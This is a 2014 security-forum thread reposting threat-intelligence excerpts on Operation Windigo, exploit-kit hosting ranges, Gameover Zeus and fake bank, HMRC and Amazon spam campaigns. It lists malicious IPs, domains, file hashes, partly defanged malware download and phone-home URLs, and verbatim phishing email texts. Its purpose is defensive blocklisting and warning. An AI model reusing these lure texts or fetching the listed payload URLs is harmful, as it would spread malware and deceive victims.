500,000 PCs attacked after 25,000 UNIX servers hijacked ...
- http://www.welivesecurity.com/2014/03/18/attack-unix-operation-windigo/
Mar 18, 2014 - "... Researchers at ESET, in collaboration with CERT-Bund, the European Organization for Nuclear Research (CERN), the Swedish National Infrastructure for Computing and other agencies, have uncovered a widespread cybercriminal operation that has seized control of tens of thousands of Unix servers. And if your system is found to be infected, experts strongly recommend you re-install the operating system, and consider all credentials used to log into the machine as compromised. In short, if you are a victim, all passwords and private OpenSSH keys should be changed. The attack, which has been given the name “Windigo” after a mythical creature from Algonquian Native American folklore, has resulted in over 25,000 Unix servers being hacked, resulting in 35 million spam messages being sent each day from compromised machines...
> http://www.welivesecurity.com/wp-content/uploads/2014/03/windigo-spam.jpeg
... That would be bad enough, normally. But in this case, malicious hackers have also been using hijacked web servers to infect visiting Windows PCs with click fraud and spam-sending malware, and display dating website adverts to Mac users. Even smartphone users don’t escape – finding their iPhones redirected to X-rated content, with the intention of making money for the cybercriminals...
> http://www.welivesecurity.com/wp-content/uploads/2014/03/windigo-iphone.jpeg
ESET’s security research team has published a detailed technical paper* into “Operation Windigo”, and says it believes that the cybercrime campaign has been gathering strength, largely unnoticed by the security community, for over two and a half years..."
An analysis of the visiting computers revealed a wide range of operating systems being used:
> http://www.welivesecurity.com/wp-content/uploads/2014/03/victims-by-os.jpeg
(More detail at the welivesecurity URL at the top.)
* http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf

Indicators of Compromise
- https://github.com/eset/malware-ioc

:mad: :fear:

AplusWebMaster
2014-03-19, 14:35
FYI...

More OVH Canada hosted exploit kits
- http://blog.dynamoo.com/2014/03/more-ovh-canada-hosted-exploit-kits.html
19 Mar 2014 - "... Yesterday Frank identified three new OVH Canada ranges* being used to host the Nuclear EK [1], again the customer is "r5x .org / Penziatki"
198.50.212.116/30
198.50.131.220/30
192.95.40.240/30
Update: also 192.95.51.164/30 according to this Tweet**... A full list of everything I can find is here*** [pastebin] ... At a mininum I recommend that you block those IP ranges and/or domains.
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
(More detail at the dynamoo URL above.)

* https://twitter.com/jedisct1/status/445970337490927616

** https://twitter.com/jedisct1/status/446154856093343744

*** http://pastebin.com/4eGWBwHV

1] http://krebsonsecurity.com/tag/nuclear-exploit-pack/

Updated - Mar 20, 2014: http://blog.dynamoo.com/search/label/OVH
___

Something evil on 64.120.242.160/27
- http://blog.dynamoo.com/2014/03/something-evil-on-6412024216027.html
19 Mar 2014 - "64.120.242.160/27 (Network Operations Center, US) is hosting a number of exploit domains (see this example report at VirusTotal*). There appears to be a variety of badness involved, and many of the domains hosted in the range are flagged as malicious by Google or SURBL (report here** [csv]). There appears to be nothing legitimate in this whole range. Domains flagged as malicious by Google are highlighted, ones marked as malicious by SURBL are in italics. I would recommend you block the entire lot.
64.120.242.160/27
asifctuenefcioroxa .net
hukelmshiesuy .net
asifctuenefcioroxa .com
asifctuenefcioroxa .info ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/ip-address/64.120.242.180/information/

** http://www.dynamoo.com/files/64.120.242.160-27.csv
___

Fake NatWest SPAM ...
- http://blog.dynamoo.com/2014/03/natwest-you-have-received-secure.html
19 Mar 2014 - "This -fake- NatWest spam has a malicious attachment:
Date: Wed, 19 Mar 2014 15:14:02 +0100 [10:14:02 EDT]
From: NatWest [secure.message@ natwest .co .uk]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 4226.
First time users - will need to register after opening the attachment...

Attached to the message is an archive file SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has a VirusTotal detection rate of 8/51*. Automated analysis tools... show attempted downloads from the following domains, both hosted on servers that appear to be completely compromised and should be blocked.
199.193.115.111 (NOC4Hosts, US) ...
184.107.149.74 (iWeb, Canada) ...
50.116.4.71 (Linode, US) ...
Recommended blocklist:
199.193.115.111
184.107.149.74
50.116.4.71 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/bcae5b59eef951338360e461038920511bb16e667f3a7595c42fe86ca9035c9c/analysis/1395245960/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e8680fb74314899d9ece73bd8ebca5f2/tumblr_inline_n2p5d8Mol61r6pupn.png
___

Steer Clear of the Latest Twitter Spamrun
- http://blog.malwarebytes.org/social-engineering/2014/03/steer-clear-of-the-latest-twitter-spamrun/
Mar 19, 2014 - "Watch out for messages on your Twitter feed like the ones below, because they’ll try their best to give your account a bad hair day:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/twitphish1.jpg
Some of the (many) messages read as follows, and all are designed to entice the recipient into clicking:
lmao I had a eerie feeling this was yours
haha this post by you is so funny
haha this was made by you?
Im laughing so much right now at this
haha this update by you is odd
lol I had a eerie feeling this was you
lolz this post by you is nuts
lol this was posted by you?
omfg this entry by you is crazy
lolz this tweet by you is so funny
LOL you got 2 see this, its epic
omfg this post by you is cool
lolz this post by you is hilarious... (more)
There are others, but those seem to be the main ones and everything else is typically a variation on the above themes. The links take end-users to a site informing them of the following:
“Your current session has ended
For security purposes you were forcibly signed out. For security purposes you need to verify your Twitter account, please login”
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/twitpsh2.jpg
... change your password if you think you’ve already been affected by this one and clear up any rogue links lying around on your feed – your followers will thank you for it.
Christopher Boyd (Hat-tip to @Cliffsull *)"
* https://twitter.com/cliffsull

:mad::mad:

AplusWebMaster
2014-03-20, 17:04
FYI...

Something evil on 66.96.195.32/27
- http://blog.dynamoo.com/2014/03/something-evil-on-66961953227.html
Mar 20, 2014 - "Another bad bunch of IPs hosted by Network Operations Center in Scranton following on from yesterday*, this time 66.96.195.32/27 which seems to be more of the same thing. The exploit kit in question is the Goon EK, as shown in this URLquery report**. It seems that it spreads by malicious SWF files being injected into legitimate websites (I think this one, for example [3]). The easiest thing to do would be to block traffic to 66.96.195.32/27, but I can see... malicious websites active in that range (all on 66.96.195.49 [4])..."
* http://blog.dynamoo.com/2014/03/something-evil-on-6412024216027.html

** http://urlquery.net/report.php?id=1395311494976

3] http://urlquery.net/report.php?id=1395322515680

4] https://www.virustotal.com/en/ip-address/66.96.195.49/information/
___

PHP bug allowing site hijacking still menaces Internet 22 months on
- http://arstechnica.com/security/2014/03/php-bug-allowing-site-hijacking-still-menaces-internet-22-months-on/
Mar 19 2014 - "A vulnerability that allows attackers to take control of websites running older versions of the PHP scripting language continues to threaten the Internet almost two years after security researchers first warned that attackers could use it to remotely execute malicious code on vulnerable servers. As Ars reported 22 months ago, the code-execution exploits worked against PHP sites only when they ran in common gateway interface mode, a condition that applied by default to those running the Apache Web server. According to a blog post published Tuesday*, CVE-2012-1823**, as the vulnerability is formally indexed, remains under attack today by automated scripts that scour the Internet in search of sites that are susceptible to the attack. The sighting of in-the-wild exploits even after the availability of security patches underscores the reluctance of many sites to upgrade... PHP versions prior to 5.3.12 and 5.4.2 are vulnerable. The Imperva blog post* said that an estimated 16 percent of public websites are running a vulnerable version. People running susceptible versions should upgrade right away. Readers who visit vulnerable sites should notify the operators of the risk their site poses..."
* http://blog.imperva.com/2014/03/threat-advisory-php-cgi-at-your-command.html
Mar 18, 2014

** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 - 7.5 (HIGH)
Last revised: 07/20/2013
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Shipping Documents Email Messages - 2014 Mar 20
Fake Financial Documents Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Tax Return Notification Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Document Processing Request Email Messages - 2014 Mar 20
Fake Fax Message Delivery Email Messages - 2014 Mar 20
Fake Product Order Quotation Email Messages - 2014 Mar 20
Fake Tax Document Email Messages - 2014 Mar 20
Fake Payroll Information Notification Email Messages - 2014 Mar 20
Fake Incoming Money Transfer Notification Email Messages - 2014 Mar 20
Fake Bank Payment Transfer Notification Email Messages - 2014 Mar 20
Fake Lawsuit Details Attachment Email Messages - 2014 Mar 20
Fake Account Payment Information Email Messages - 2014 Mar 20
Fake Product Order Notification Email Messages - 2014 Mar 20
Fake Failed Delivery Notification Email Messages - 2014 Mar 20
Fake Bank Transaction Notification Email Messages - 2014 Mar 19
(More detail and links at the cisco URL above.)

:mad: :sad:

AplusWebMaster
2014-03-21, 15:07
FYI...

Fake Amazon .co .uk SPAM, Something evil on 50.116.4.71
- http://blog.dynamoo.com/2014/03/amazoncouk-spam-something-evil-on.html
21 Mar 2014 - "This -fake- Amazon .co .uk spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 13:40:05 +0530 [04:10:05 EDT]
From: "AMAZON .CO .UK" [SALES@ AMAZON .CO .UK]
Cc: ; Fri, 21 Mar 2014 13:40:05 +0530
Subject: Your Amazon.co.uk order ID841-6379889-7781077
Hello, Thanks for your order. We’ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #799-5059801-3688207 Placed on March 21, 2014 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk...

There is an attachment Order details 21.04.2014 Amazon 19-1101.zip which contains a quite large 596Kb malicious executable Order details 21.04.2014 Amazon 19-1101.exe which only has a VirusTotal detection rate of 2/51*. The Malwr analysis** the most comprehensive, and shows that it attempts to phone home... Out of these, aulbbiwslxpvvphxnjij .biz seems to be active on 50.116.4.71 (Linode, US). Combining the "phone home" domains with the other malicious domains hosted on that IP gives the following recommended blocklist:
50.116.4.71
afaxdlrnjdevgddqrcvkdmvemwo .org ..."
(Long list at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/e29581210f0b598569efc5320706650f7d95860deaf05a064ba4097f72e8f052/analysis/1395393900/

** https://malwr.com/analysis/MWI1MGFlYTIyNzBkNGM4Y2I4NmIzOGMzMmViZTk4ZjI/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/
___

Fake Companies House SPAM and 50.116.4.71 (again)
- http://blog.dynamoo.com/2014/03/companies-house-spam-and-50116471-again.html
21 Mar 2014 - "This -fake- Companies House spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 11:05:35 +0100 [06:05:35 EDT]
From: Companies House [WebFiling@ companieshouse .gov .uk]
Subject: Incident 8435407 - Companies House
The submission number is: 8435407
For more details please check attached file.
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other Organizations that handle public funds.
If you have any queries please contact the Companies House Contact Centre
on +44 (0)303 1234 500 or email enquiries@companies-house .gov .uK
Note: This email was sent from a notification-only email address which cannot
accept incoming email. Please do not reply directly to this message...

Attached is an archive file CH_Case_8435407.zip which in turn contains the malicious executable CH_Case_21032014.scr which has a VirusTotal detection rate of 3/49*. The Malwr analysis -again- shows an attempted connection to a Linode IP at 50.116.4.71 using the domain aulbbiwslxpvvphxnjij .biz. The malware also downloads a config file from a hacked WordPress installation at [donotclick]premiercrufinewine .co .uk/wp-content/uploads/2014/03/2103UKp.qta plus a number of other domains that are not resolving (listed below). I would recommend... the following blocklist in combination with this one.
50.116.4.71
aulbbiwslxpvvphxnjij.biz ..."
(Long list at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395396703/
___

Fake Air Canada Ticket - malware
- http://www.threattracksecurity.com/it-blog/air-canada-ticket-malware/
Mar 20, 2014 - "... The email (pictured below) was directed to an employee inbox purporting to be from Air Canada and directing the recipient to download and print their ticket. (Note: Air Canada was not hacked, nor were they part of this malware. The malicious URL distributing a previously unidentified malware is simply being masked to look like it’s coming from Air Canada.)
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/03/Air-Canada-Malicious-Email.png
The link hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?action=download&fid=QB820910108CA pointed to another address, hxxp ://alienstub.com/pdf_ticket_820910108.zip, which hosts the malware, a zipped malicious file. Once the zip file is decompressed, the user will see a file called pdf_ticket_820910108.pif . Analysis by ThreatSecure quickly revealed the sample as an exploit categorized with a high severity (see in-product analysis screen below), exhibiting malicious behavior like disabling the Windows firewall, changing proxy settings in Internet Explorer, opening the command prompt, creating executable files and connecting to Windows Remote Access Connection Manager.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/03/Air-Canada-pdf_ticket_820910108_pif-analsysi.jpg
... At the time of posting this blog, 16/51* antivirus vendors on VirusTotal detect this file as being malicious. The domain hxxp ://alienstub .com appears to be registered in China...
* https://www.virustotal.com/en/file/dbe55e69e25eb2a71208c8b223e2527cdc2912c95500276499e761c0fe687622/analysis/

alienstub .com

108.162.198.134 - https://www.virustotal.com/en-gb/ip-address/108.162.198.134/information/

108.162.199.134 - https://www.virustotal.com/en-gb/ip-address/108.162.199.134/information/

:fear: :mad:

AplusWebMaster
2014-03-23, 13:33
FYI...

Malware sites to block 23/3/14 (P2P/Gameover Zeus)
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-23314.html
23 Mar 2014 - "These domains and IPs are associated with the Peer-to-peer / Gameover variant of Zeus as described in this blog post at MalwareMustDie*. I recommend that you -block- the -IPs- and/or domains listed as they are all malicious:
50.116.4.71 (Linode, US) ...
178.79.178.243 (Linode, UK)
212.71.235.232 (Linode, UK)
23.239.140.156 (Root Level Technology, US)

50.116.4.71 ...
178.79.178.243 ...
212.71.235.232 ...
23.239.140.156 ..."
(More - long list of domains listed at the dynamoo URL above.)
* http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html

:mad::mad: :fear:

AplusWebMaster
2014-03-25, 15:42
FYI...

Fake Flash update hosted on OneDrive
- http://blog.dynamoo.com/2014/03/js-injection-leads-to-fake-flash-update.html
25 Mar 2014 - "This kind of attack is nothing new, but there has been a sharp uptick recently in injection attacks that alter .js files on vulnerable systems. The payload is a -fake- Flash update with a surprisingly low detection rate, hosted on Microsoft OneDrive. The first step in the attack is through a vulnerable site such as this one . In turn, the infected .js file leads to [donotclick]alientechdesigns .com/NLBFH8ZG.php?id=88473423 which in turn leads to a fake Flash popup hosted at [donotclick]alientechdesigns .com/NLBFH8ZG.php?html=27 which you can see an approximation of here [urlquery**].
> [url]https://lh3.ggpht.com/-sLx4s_0GoKQ/UzFS03GnLzI/AAAAAAAACvo/Ee3FYtmdQS4/s1600/fake-flash.jpg
The link in the popup goes to a download loction at [donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21111 which downloads a file flashplayerinstaller.exe. flashplayerinstaller.exe is the first stage in the infection, it has a VirusTotal detection rate of just 3/51***. The Malwr report shows that this then downloads two additional components, from:
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21112
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21108
The first one of these is called flashplayer2.exe which has a VirusTotal detection rate of 4/51 [5]. Malwr, Anubis and Comodo CAMAS show some working of this malware. The second file is called update2.exe with a VirusTotal detection rate of 5/49****. This seems somewhat resistant to automated analysis tools... This sort of attack is hard to block from a network point of view as it leverages legitimate sites. Perhaps the best way to protect yourself is a bit of user education about where it is appropriate to download updates from."
* http://urlquery.net/report.php?id=1395739538065

** http://urlquery.net/report.php?id=1395739786885

*** https://www.virustotal.com/en-gb/file/c4eb5f04b6af9115b01b66e79319549022985fea8c8601baedb97984f85aadf2/analysis/1395739964/

**** https://www.virustotal.com/en-gb/file/03dcf82ca30117fd9d6a6c2e88dcc7bfae245264185d9076ed8f292de5ef063c/analysis/1395742041/

5] https://www.virustotal.com/en/file/9741fa0533065246754c8d9cb224c92dd2c7bb4db3a43657c22d6870ee85b276/analysis/1395740434/
___

Fake HMRC SPAM
- http://blog.dynamoo.com/2014/03/you-have-received-new-messages-from.html
25 Mar 2014 - "This fake HMRC spam comes with a malicious attachment:
Date: Tue, 25 Mar 2014 12:59:28 +0100 [07:59:28 EDT]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices....

The attachment is called HMRC_TAX_Notice_rep.zip which in turn contains a malicious exectuable HMRC_TAX_Notice_rep.scr which has a VirusTotal detection rate of 5/51*. According to the Malwr report, the malware makes a download from the following locations hosted on 67.205.16.21 (New Dream Network, US):
[donotclick]sandsca .com.au/directions/2503UKp.tis
[donotclick]www.sandsca .com.au/directions/2503UKp.tis
Subsequent communications are made with aulbbiwslxpvvphxnjij .biz on the familiar looking Linode IP of 50.116.4.71, and also qkdapcqinizsczxrwaelaimznfbqq .biz on another Linode IP of 178.79.178.243. An attempt it also made to connect to hzdmjjneyeuxkpzkrunrgyqgcukf .org which does not resolve...
Recommended blocklist:
50.116.4.71
178.79.178.243
sandsca .com
aulbbiwslxpvvphxnjij .biz
qkdapcqinizsczxrwaelaimznfbqq .biz
hzdmjjneyeuxkpzkrunrgyqgcukf .org "
* https://www.virustotal.com/en-gb/file/720a7e07e609424154f879bb20af8cc93cf9bd490adf0c4c31a836e1403cb9a7/analysis/1395750216/

- https://www.virustotal.com/en/ip-address/67.205.16.21/information/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/

- https://www.virustotal.com/en/ip-address/178.79.178.243/information/
___

Google Drive Email - Phish ...
- http://www.hoax-slayer.com/google-drive-email-phishing-scam.shtml
Mar 25, 2014 - "... email requests recipients to click a link to view a document that the sender uploaded using Google Cloud Drive. There is no document to be viewed, urgent or otherwise. The email is a -phishing- scam designed to trick recipients into giving their email login details to Internet criminals... Example:
Hello,
Kindly click the link to view the document I uploaded for you using Google
cloud drive.
[Link removed]
Just Sign in with your email to view the document, it is very important.
Thank you,
Rev. Dr. Karen [Surname Removed]
Serving Humanity Spiritually
[Phone number removed]
Good works are links that form a chain of love.
Mother Teresa

Screenshot of phishing website:
> http://www.hoax-slayer.com/images/google-drive-email-phishing-scam-1.jpg
... Users who fall for the ruse and click the link as instructed will be taken to a -bogus- website that includes the Google Drive logo along with a login screen that asks for both their email address and email password. If users submit their email credentials as requested and click the 'View document' button, they will be redirected to Google's Gmail home page... however, their email address and password will be sent to online criminals. The criminals can use the stolen details to hijack webmail accounts belonging to victims. Hijacked accounts can be used to perpetrate more scam and spam campaigns, all in the names of the victims. If victims submitted details for a Gmail account, the scammers may be able to use the same login information to access other Google services as well as email..."
___

Gameover ZeuS now targets users of employment websites
- http://net-security.org/malware_news.php?id=2745
Mar 25, 2014 - "Some newer variants of the Gameover Zeus Trojan, which is exceptionally good at using complex web injections to perform Man-in-the-Browser (MITB) attacks and gain additional information about the victims to be used for bypassing multi-factor authentication mechanisms and effecting social engineering attacks, has been spotted targeting users of popular employment websites. They initially focused on CareerBuilder.com (largest employment website in the US), but now also on Monster.com (one of the largest in the world). The -fake- login page victims are served with looks virtually identical to the legitimate one, but the next one is web form injected by the malware:
> http://www.net-security.org/images/articles/monster-25032014.jpg
There are 18 different questions to choose from, and they range from the name of the city where your sibling lives/you got your first job/you met your spouse, to the name of your school(s)/friend/work supervisor and significant dates and numbers in your life..."

- http://www.f-secure.com/weblog/archives/00002687.html
March 25, 2014
___

Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs
- http://www.webroot.com/blog/2014/03/25/deceptive-ads-expose-users-adware-linkularwin32-speedupmypc-puas-potentially-unwanted-applications/
Mar 25, 2014 - "Rogue vendors of Potentially Unwanted Applications (PUAs) continue tricking tens of thousands of gullible users into installing deceptive and privacy violating applications. Largely relying on ‘visual social engineering’ tactics and basic branding concepts, the majority of campaigns convincingly present users with legitimately looking ToS (Terms of Service)/EULA (End User License Agreements) which socially engineered users accept, thereby assuming the responsibility for the potential privacy-violating activities taking place on their host. We’ve recently spotted yet another PUA campaign, relying on deceptive “Download Now” types of ads, enticing users into downloading the bogus GetMyFiles (Adware.Linkular) application, as well as the rogue SpeedUpMyPC (Win32.SpeedUpMyPC.A) PUA...
Sample screenshot of Adware.Linkular download page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/W32.Linkular_W32.SpeedUpMy_PUA_Potentially_Unwanted_Application.png
Sample screenshot of Win32.SpeedUpMyPC.A download page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/W32.Linkular_W32.SpeedUpMy_PUA_Potentially_Unwanted_Application_01.png
Domain name reconnaissance:
getmyfilesnow .info – 54.208.165.36
getmyfilesnow .com – 174.142.147.2
coollinks .us – 174.142.147.5
linkular .com – 208.109.216.125
Detection rate for the PUA: MD5: 0d60941d1ec284cab2e861e05df89511 * ...
Known to have responded to 54.208.165.36 ...
Once executed, the sample phones back to:
hxxp // 107.23.152.80 /api/software/?s=887&os=win32&output=1&v=2.2.2&l=1033&np=0&osv=5.1&b=ie&bv=8.0.6001.18702&c=12&cv=2.2.2.1768
Sample detection rate for the Win32.SpeedUpMyPC.A PUA:
MD5: 0a8ecb11e39db5647dcad9f0cc938c99 ** ... "
* https://www.virustotal.com/en/file/27e3a79e9405ac38cd0f1553d412a564279e1f300f89b8fafcc0034165a62263/analysis/1395713453/

** https://www.virustotal.com/en/file/eb14a3e1aa2fab53c557f26130b7c1a59280d7fbb331675de7aae59526fe8328/analysis/1395717259/

:mad::mad: :fear:

AplusWebMaster
2014-03-26, 18:27
FYI...

Something evil on 173.212.223.249
- http://blog.dynamoo.com/2014/03/something-evil-on-173212223249.html
26 Mar 2014 - "There's some sort of evil at work here, but I can't quite replicate it.. however I would recommend that you put a block in for 173.212.223.249 (Network Operations Center, US). The infection chain I have spotted here starts with a typical compromised website, in this case:
[donotclick]onerecipedaily .com/prawn-patia-from-anjum-anands-i-love-curry/
A quick look at the URLquery report* shows a general alert, but no smoking gun.. The incident logs come up with a generic detection... The following malicious subdomains are also active on 173.212.223.249:
bkbr.beuqnyrtz .com
syb.beuqnyrtz .com
sxxmxv.beuqnyrtz .info
The simplest thing to do to protect yourself against this particular threat is to use the following blocklist:
173.212.223.249
beuqnyrtz .com
beuqnyrtz .info "
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1395844844686

- https://www.virustotal.com/en/ip-address/173.212.223.249/information/

- https://www.virustotal.com/en/ip-address/184.168.179.1/information/
___

Info from SantanderBillpayment. co .uk - fake PDF malware
- http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
26 Mar 2014 - "Info from SantanderBillpayment.co.uk pretending to come from Santanderbillpayment-noreply@SantanderBillPayment .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. Analysis of this one is showing it likely to be a Gameover Zeus/Zbot variant. This is “new” — it’s going after a similar URL as the Pony samples we have been seeing in the last few weeks, but completely different binary. This has VM detection and if it detects that, it runs routines to choke memory and the CPU. On real hardware, it tries this URL (http :// 62.76.45.233 /2p/1.exe) given recent patterns, this is likely to be a Gameover production...
Thank you for using BillPay. Please keep this email for your records.
The following transaction was received on 18 March 2014 at 20:03:41.
Payment type: VAT
Customer reference no: 9789049470611
Card type: Visa Debit
Amount: 483.93 GBP
Your transaction reference number for this payment is IR19758383.
Please quote this reference number in any future communication regarding this payment.
Full information in attachment.
Yours sincerely,
Banking Operations
This message is intended for the named person above and may be confidential, privileged or otherwise protected from disclosure...

26 March 2014 : VAT_F37D8FE5F9.zip (72kb) : Extracts to ATT00347_761105586544.pdf.exe
Current Virus total detections: 7/51* MALWR Auto Analysis** ...
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c206690a0e6a12dd8c9f2052029221db0fad83c1750a10a83a21216dda42d4a2/analysis/

** https://malwr.com/analysis/NTQyOGVhNDc1NTJiNDQ5OGFiYTA3ZTRlMDZmMjVhMDk/

- https://www.virustotal.com/en/ip-address/62.76.45.233/information/

:mad::fear::sad:

AplusWebMaster
2014-03-27, 12:22
FYI...

Malware magnets ...
Cisco's threat metrics show pharmaceutical and chemical firms are 11 times more susceptible to Web malware
- http://www.infoworld.com/t/cyber-crime/chemical-and-drug-makers-are-the-biggest-malware-magnets-238909
Mar 24, 2014 - "... Cyber crime has been estimated* at costing the U.S. economy $100 billion annually, with smaller companies feeling the pain** more often due to inadequate defenses. If Cisco's analyses are on track - and the numbers hold true for people outside of Cisco's customer base - attacks are likely to grow even more targeted to match their victims in the future, with narrower niches singled out by attackers based on their industry."
* http://www.infoworld.com/d/security/cyber-crime-costs-us-economy-100-billion-and-500000-jobs-223352

** http://www.infoworld.com/d/security/symantec-report-finds-small-businesses-battered-cyber-crime-216543

Feb 2014 Threat Metrics
- http://blogs.cisco.com/security/february-2014-threat-metrics/
Mar 21, 2014 - "Web surfers in February 2014 experienced a median malware encounter rate of 1:341 requests, compared to a January 2014 median encounter rate of 1:375. This represents a 10% increase in risk of encountering web-delivered malware during the second month of the year. February 8, 9, and 16 were the highest risk days overall, at 1:244, 1:261, and 1:269, respectively. Interestingly, though perhaps not unexpectedly, web surfers were 77% more likely to encounter Facebook scams on the weekend compared to weekdays. 18% of all web malware encounters in February 2014 were for Facebook related scams.
> http://blogs.cisco.com/wp-content/uploads/Feb2014Rate.jpg
The ratio of unique non-malicious hosts to unique malware hosts was fairly constant between the two months, at 1:4808 in January 2014 and 1:4775 in February 2014. Likewise, the rate of unique non-malicious IP addresses to malicious IP addresses was also similar between the two months, at 1:1330 in January 2014 compared to 1:1352 in February 2014.
> http://blogs.cisco.com/wp-content/uploads/Feb2014hosts.jpg
While Java malware encounters were 4% of all web malware encounters in January 2014, that rate increased to 9% in February. Of particular interest was the increase in the rate of Java malware encounters involving versions older than Java 7 or Java 6, which increased to 33% of all Java malware encounters in February 2014 from just 13% in the month prior.
> http://blogs.cisco.com/wp-content/uploads/Feb2014java.jpg
During the month of February 2014, risk ratings for companies in the Media & Publishing vertical increased 417%, Utilities increased 218%, and Insurance 153%. Companies in Pharmaceutical & Chemical remained at a consistent high rate, with a slight increase from a 990% risk rating in January 2014 to an 1100% risk rating in February. To assess vertical risk, we first calculate the median encounter rate for all enterprises, and then calculate the median encounter rate for all enterprises in a particular vertical, then compare the two. A rate higher than 100% is considered an increased risk.
> http://blogs.cisco.com/wp-content/uploads/Feb2014vert.jpg
Following a January 2014 spam volume decrease of 20% in January 2014, spam volumes increased 73% in February 2014...
> http://blogs.cisco.com/wp-content/uploads/Feb2014spamvol.jpg
The top five global spam senders in February 2014 were the United States at 16.5%, followed by the Russian Federation at 12.41%, with Spain, China, and Germany a distant 3.77%, 3.39%, and 3%, respectively. Though the Russian Federation was also in the number two spot in January 2014, it was a significant volume increase from only 5.10% of global spam origin that month."
___

Secure Message from various banks – fake PDF malware
- http://myonlinesecurity.co.uk/secure-message-various-uk-foreign-banks-fake-pdf-malware/
Mar 27, 2014 - "... pretends to come from various banks is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... We have seen a couple of different versions over the last few days from different banks, including HSBC, and Natwest...
Subjects seen are:
You have a new Secure Message
You have received a secure message
HSBC secure mail
Secure Message
You have received a secure message
Read your secure message by opening the attachment. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the HSBC Secure Mail Help Desk.
First time users – will need to register after opening the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/hsbc-secure-mail.png

Natwest Secure Message:
You have received a encrypted message from NatWest Customer Support
